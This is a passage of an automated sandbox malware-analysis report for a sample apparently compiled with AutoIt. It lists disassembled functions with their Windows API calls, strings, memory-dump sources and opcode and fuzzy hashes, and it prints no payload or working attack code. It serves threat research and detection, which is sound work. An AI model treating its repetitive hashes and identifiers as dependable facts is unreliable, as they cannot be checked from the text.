                                                                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                        Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                        Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: u,D
                                                                        • API String ID: 4104443479-3858472334
                                                                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                        Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend_mallocwsprintf
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 1262938277-328681919
                                                                        • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                        • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                        Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                        • String ID: aeB
                                                                        • API String ID: 857135153-906807131
                                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                        Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                        Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                        Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D